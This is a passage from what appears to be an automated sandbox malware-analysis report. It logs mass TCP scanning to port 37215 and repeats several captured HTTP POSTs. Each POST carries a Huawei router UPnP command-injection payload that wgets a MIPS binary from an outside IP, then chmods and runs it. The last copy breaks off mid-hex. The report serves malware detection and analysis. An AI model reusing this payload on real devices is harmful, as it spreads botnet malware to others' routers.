          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.127.79.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.68.93.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.125.131.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.114.10.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.79.45.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.169.12.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.6.168.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.19.25.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.94.151.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.134.220.168:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.184.55.254:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.115.189.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.173.130.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.145.62.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.96.65.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.46.239.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.196.126.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.66.251.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.178.79.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.199.220.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.149.51.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.152.83.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.28.149.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.41.65.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.231.114.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.84.243.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.32.107.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.82.66.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.151.231.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.92.14.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.178.219.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.41.59.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.255.183.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.85.47.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.131.8.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.163.196.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.193.30.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.60.237.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.68.2.39:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.17.217.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.111.203.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.173.183.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.249.37.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.113.106.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.29.66.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.147.153.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.31.9.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.79.158.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.38.228.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.74.57.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.187.194.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.204.153.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.141.57.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.146.188.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.140.127.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.62.231.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.152.141.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.128.51.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.53.83.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.127.233.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.22.46.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.50.104.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.105.203.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.35.132.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.66.173.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.165.181.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.6.110.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.229.20.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.102.152.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.34.113.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.169.244.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.106.183.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.146.78.124:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.159.163.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.68.215.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.68.222.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.88.184.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.36.70.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.22.215.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.0.70.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.184.203.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.237.248.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.239.102.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.139.178.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.77.157.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.33.214.162:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.73.158.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.204.224.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.153.132.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.216.200.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.35.42.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.150.19.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.18.55.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.79.13.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.7.66.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.223.19.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.11.81.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.21.21.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.74.223.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.239.44.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.22.242.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.179.119.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.26.15.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.169.246.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.11.128.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.62.115.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.122.157.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.147.187.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.27.67.39:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.136.209.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.19.52.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.102.48.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.17.21.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.90.83.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.101.223.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.145.164.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.211.111.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.105.16.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.38.13.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.195.193.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.225.166.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.97.60.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.107.221.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.68.108.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.225.121.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.15.101.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.108.93.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.146.175.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.200.157.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.189.90.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.98.242.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.172.68.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.136.0.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.238.183.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.55.157.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.160.0.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.192.137.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 197.76.73.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 41.246.60.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:37451 -> 156.39.108.63:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 